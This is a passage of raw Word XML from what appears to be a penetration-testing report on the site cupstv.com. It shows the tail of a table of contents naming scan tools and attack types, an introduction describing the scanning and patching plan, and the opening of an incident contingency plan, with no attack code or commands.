          <w:hyperlink w:anchor="_Toc501124786" w:history="1">
            <w:r w:rsidR="0066017F" w:rsidRPr="00641BF9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2 SQL Map</w:t>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc501124786 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5EAEF45D" w14:textId="77777777" w:rsidR="0066017F" w:rsidRDefault="00976736">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc501124787" w:history="1">
            <w:r w:rsidR="0066017F" w:rsidRPr="00641BF9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.3 Owasp ZAP</w:t>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc501124787 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="78E16B73" w14:textId="77777777" w:rsidR="0066017F" w:rsidRDefault="00976736">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc501124788" w:history="1">
            <w:r w:rsidR="0066017F" w:rsidRPr="00641BF9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5. Attacks</w:t>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc501124788 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7AE4088B" w14:textId="77777777" w:rsidR="0066017F" w:rsidRDefault="00976736">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc501124789" w:history="1">
            <w:r w:rsidR="0066017F" w:rsidRPr="00641BF9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.1 SQL Injection</w:t>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc501124789 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1928C0BF" w14:textId="77777777" w:rsidR="0066017F" w:rsidRDefault="00976736">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc501124790" w:history="1">
            <w:r w:rsidR="0066017F" w:rsidRPr="00641BF9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2 Cross Site Scripting (XSS)</w:t>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc501124790 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4B7729CA" w14:textId="77777777" w:rsidR="0066017F" w:rsidRDefault="00976736">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc501124791" w:history="1">
            <w:r w:rsidR="0066017F" w:rsidRPr="00641BF9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.3 Remote OS Command Injection</w:t>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc501124791 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="358B1262" w14:textId="77777777" w:rsidR="0066017F" w:rsidRDefault="00976736">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc501124792" w:history="1">
            <w:r w:rsidR="0066017F" w:rsidRPr="00641BF9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.Solution and Cost</w:t>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc501124792 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="334D17F0" w14:textId="77777777" w:rsidR="0066017F" w:rsidRDefault="00976736">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc501124793" w:history="1">
            <w:r w:rsidR="0066017F" w:rsidRPr="00641BF9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.Timetable</w:t>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc501124793 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2F9C1FF7" w14:textId="77777777" w:rsidR="0066017F" w:rsidRDefault="00976736">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc501124794" w:history="1">
            <w:r w:rsidR="0066017F" w:rsidRPr="00641BF9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>9. Conclusion</w:t>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc501124794 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="13830F0A" w14:textId="77777777" w:rsidR="0066017F" w:rsidRDefault="00976736">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc501124795" w:history="1">
            <w:r w:rsidR="0066017F" w:rsidRPr="00641BF9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.Refrences</w:t>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc501124795 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="25E4B0FA" w14:textId="77777777" w:rsidR="0066017F" w:rsidRDefault="00976736">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc501124796" w:history="1">
            <w:r w:rsidR="0066017F" w:rsidRPr="00641BF9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>11. Appendices</w:t>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc501124796 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidR="0066017F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="51661F17" w14:textId="77777777" w:rsidR="001B121C" w:rsidRPr="001B121C" w:rsidRDefault="001B121C">
          <w:r w:rsidRPr="001B121C">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="55C39F01" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C"/>
    <w:p w14:paraId="4CB7C78C" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C"/>
    <w:p w14:paraId="416F2C10" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C"/>
    <w:p w14:paraId="60FA325C" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C"/>
    <w:p w14:paraId="796AD75F" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C"/>
    <w:p w14:paraId="12D5638E" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C"/>
    <w:p w14:paraId="1F5904CC" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C"/>
    <w:p w14:paraId="3519C127" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C"/>
    <w:p w14:paraId="3813D41A" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C"/>
    <w:p w14:paraId="6BBCC89A" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C"/>
    <w:p w14:paraId="4468B002" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C"/>
    <w:p w14:paraId="7F352480" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C"/>
    <w:p w14:paraId="34C6324B" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C"/>
    <w:p w14:paraId="32844163" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C"/>
    <w:p w14:paraId="16CD3A26" w14:textId="77777777" w:rsidR="008B2BB4" w:rsidRDefault="008B2BB4"/>
    <w:p w14:paraId="5A3C8CB5" w14:textId="77777777" w:rsidR="008B2BB4" w:rsidRDefault="008B2BB4"/>
    <w:p w14:paraId="5FEEF1D7" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C" w:rsidP="001B121C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc501124778"/>
      <w:r w:rsidRPr="001B121C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="6CC0A922" w14:textId="77777777" w:rsidR="00591C89" w:rsidRDefault="00591C89" w:rsidP="00591C89"/>
    <w:p w14:paraId="36256A00" w14:textId="77777777" w:rsidR="00591C89" w:rsidRDefault="00591C89" w:rsidP="00591C89">
      <w:commentRangeStart w:id="1"/>
      <w:r>
        <w:t xml:space="preserve">This report is built around the penetration testing of </w:t>
      </w:r>
      <w:r w:rsidRPr="00591C89">
        <w:t>http://cupst</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00591C89">
        <w:t>v.com</w:t>
      </w:r>
      <w:r>
        <w:t>. The first step begun with a contingency plan being created to prepare for potential threats. These threats can cause massive damage to any network and it is best to be well prepared in the event of an attack taking place.</w:t>
      </w:r>
      <w:r w:rsidR="0058527C">
        <w:t xml:space="preserve"> The contingency plan can be applied to </w:t>
      </w:r>
      <w:r w:rsidR="00C72627">
        <w:t>all</w:t>
      </w:r>
      <w:r w:rsidR="0058527C">
        <w:t xml:space="preserve"> attacks, whether it be</w:t>
      </w:r>
      <w:r w:rsidR="00C72627">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="0058527C">
        <w:t xml:space="preserve"> network or the web page itself.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The next stages involve the actual penetrations testing</w:t>
      </w:r>
      <w:r w:rsidR="0058527C">
        <w:t>, which begun by using multiple scan tools to identify and manipulate points of weakness within the web page. There will be three scan tools used, the first is NMAP which will identify open ports and potential flaws within the network. The second will be SQL Map, this tool is specifically used to test for flaws relating to SQL Injection. If SQL Injection is possible then this tool will find the flaws within cupstv.com. The third and final tool used is OWASP ZAP, this tool scans web pages and then launches attacks to find flaws, it can run a wide array of attacks which will be selected during the scanning process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54604429" w14:textId="77777777" w:rsidR="0058527C" w:rsidRDefault="0058527C" w:rsidP="00591C89"/>
    <w:p w14:paraId="0C23C1A6" w14:textId="77777777" w:rsidR="0058527C" w:rsidRPr="00591C89" w:rsidRDefault="0058527C" w:rsidP="00591C89">
      <w:r>
        <w:t>Once the scans have finished this will give a clear picture of the flaws within the website that can be exploited. The next stage will be trying to run some attacks to exploit the flaws in cupstv.com, this will demonstrate what areas need to be fixed. Once the scans and attacks have been completed</w:t>
      </w:r>
      <w:r w:rsidR="0066017F">
        <w:t xml:space="preserve"> the next stage will involve finding solutions to patch any potential weaknesses within the website. Once the solutions have been broken down and discussed planning the implementation of the fixes will also be touched upon by creating a time-table to implement the changes over the coming weeks. Pricing will also be established to implement the necessary changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C8AE3B" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C" w:rsidP="007C4513">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc501124779"/>
      <w:r w:rsidRPr="001B121C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>2.Contingency Plan</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidR="007C4513">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D0FEB9" w14:textId="77777777" w:rsidR="007C4513" w:rsidRDefault="007C4513" w:rsidP="007C4513"/>
    <w:p w14:paraId="27C8F1A0" w14:textId="77777777" w:rsidR="002165F2" w:rsidRDefault="002165F2" w:rsidP="002165F2">
      <w:r>
        <w:t>This document will be used in the event of a network attack. If a potentially threating attack was to take place multiple bodies should be informed. This should begin with the head of Security and or IT. Although they may not be able to directly help stop the attack they will need to be informed since they are the head of the IT systems being attacked.</w:t>
      </w:r>
      <w:r w:rsidR="00C72627">
        <w:t xml:space="preserve"> The website developer should also be contacted if the attack relates to Cupstv.com.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This document will hold multiple steps which should be taken to ensure the network although under attack remains protected always. </w:t>
